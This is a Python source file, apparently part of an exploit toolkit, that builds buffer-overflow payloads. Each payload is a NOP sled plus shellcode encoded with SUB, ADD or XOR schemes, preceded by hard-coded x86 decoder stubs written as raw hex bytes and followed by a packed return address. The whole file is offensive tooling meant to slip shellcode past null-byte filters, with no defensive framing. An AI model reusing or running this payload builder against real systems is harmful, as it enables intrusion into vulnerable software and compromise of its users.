#!/usr/bin/python

import struct
import sys
import os
import telnetlib

NOP = "\x90"
DECODE_SUB =	"\xeb\x11\x5e\x31\xc9\xb1\x00\x80\x6c\x0e\xff\x00\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff"
DECODE_ADD =	"\xeb\x11\x5e\x31\xc9\xb1\x00\x80\x44\x0e\xff\x00\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff"
DECODE_XOR =	"\xeb\x11\x5e\x31\xc9\xb1\x00\x80\x74\x0e\xff\x00\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff"
DECODE_MOV =	"\xeb\x20\x5e\x31\xc0\x31\xdb\x31\xc9\xb1\x00\x8a\x44\x0e\xff\x8a\x5c\x0e\xfe\x88\x5c\x0e\xff\x88\x44\x0e\xfe\x80\xe9\x02\x75\xeb\xeb\x05\xe8\xdb\xff\xff\xff"

class BuildBuffer(object):

    def __init__(self,egg,size,addr,offset=0):
	self.egg = egg
	self.offset = offset
	self.buffer = str()
	self.size = size
	self.addr = addr 
	self.hook = None
	self._name ="NONE"
	
    def len(self):
	return len(self.buffer)

    def name(self):
	return self._name 

    def len_hook(self):
	return len(self.hook)
      
    
    def build(self):
	# Build Buffer 
	len_egg = len(self.egg.getCode())
	len_hook = len(self.hook)
	len_nop = self.size - len_egg - len_hook
	
	self.buffer += NOP * len_nop
	self.code = self.egg.getCode()
	self.ecode = self.encode(self.code,self.offset)
	self.hook = self.hook[:6] + chr(len_egg) + self.hook[7:]
	self.hook = self.hook[:11] + chr(self.offset) + self.hook[12:]
	self.buffer += self.hook
	self.buffer += self.ecode
	self.buffer += struct.pack('<L',self.addr) 
	return self.buffer
     
class BuildBufferFactory(object):
    
    def __new__(cls, *args, **kwds):
	t = args[0]
	args = args[1:]
	if t == 'SUB':
	    obj = BuildEncodeSub.__new__(BuildEncodeSub,args)
	    obj.__init__(*args)
	    return obj
	if t == 'ADD':
	    obj = BuildEncodeAdd.__new__(BuildEncodeAdd,args)
	    obj.__init__(*args)
	    return obj
	if t == 'XOR':
	    obj = BuildEncodeXor.__new__(BuildEncodeXor,args)
	    obj.__init__(*args)
	    return obj
	if t == 'NONE':
	    obj = BuildEncodeNone.__new__(BuildEncodeNone,args)
	    obj.__init__(*args)
	    return obj
	  
	fprintf("ERROR: No Encoder for '%s' found" % t )
	sys.exit(-1)
	
	  
	  
class BuildEncodeNone(BuildBuffer):
    
    def __init__(self,egg,size,addr,offset=0):
	BuildBuffer.__init__(self,egg,size,addr,offset)
	self.hook = str()
	self._name = "None"
    
    def build(self):
	# Build Buffer 
	len_egg = len(self.egg.getCode())
	len_nop = self.size - len_egg 
	
	self.buffer += NOP * len_nop
	self.code = self.egg.getCode()
	self.buffer += self.code
	self.buffer += struct.pack('<L',self.addr) 
	return self.buffer
 

class BuildEncodeSub(BuildBuffer):
    
    def __init__(self,egg,size,addr,offset=0):
	BuildBuffer.__init__(self,egg,size,addr,offset)
	self.hook = DECODE_SUB
	self._name = "SUB"
	
    def encode(self,scode,offset):
	ecode = str()
	scode_len = len(scode)
	for c in scode:
	    con = chr((ord(c) + offset) & 255)
	    if ord(con) == 0:
		fprintf("Encoded Shellcode contains NULL Byte, try different offset\n")
		sys.exit(-1)
	    ecode += con
	return ecode
  
class BuildEncodeAdd(BuildBuffer):
    
    def __init__(self,egg,size,addr,offset=0):
	BuildBuffer.__init__(self,egg,size,addr,offset)
	self.hook = DECODE_ADD
	self._name = "ADD"
	
    def encode(self,scode,offset):
	ecode = str()
	scode_len = len(scode)
	for c in scode:
	    con = chr((ord(c) - offset) & 255)
	    if ord(con) == 0:
		fprintf("Encoded Shellcode contains NULL Byte, try different offset\n")
		sys.exit(-1)
	    ecode += con
	return ecode
 
class BuildEncodeXor(BuildBuffer):
    
    def __init__(self,egg,size,addr,offset=0):
	BuildBuffer.__init__(self,egg,size,addr,offset)
	self.hook = DECODE_XOR
	self._name = "XOR"
	
    def encode(self,scode,offset):
	ecode = str()
	scode_len = len(scode)
	for c in scode:
	    con = chr((ord(c) ^ offset) & 255)
	    if ord(con) == 0:
		fprintf("Encoded Shellcode contains NULL Byte, try different offset\n")
		sys.exit(-1)
	    ecode += con
	return ecode
      
 
     
def fprintf(str):
    sys.stderr.write(str)
    sys.stderr.flush()

def line():
    fprintf("-" * 80 + "\n" )
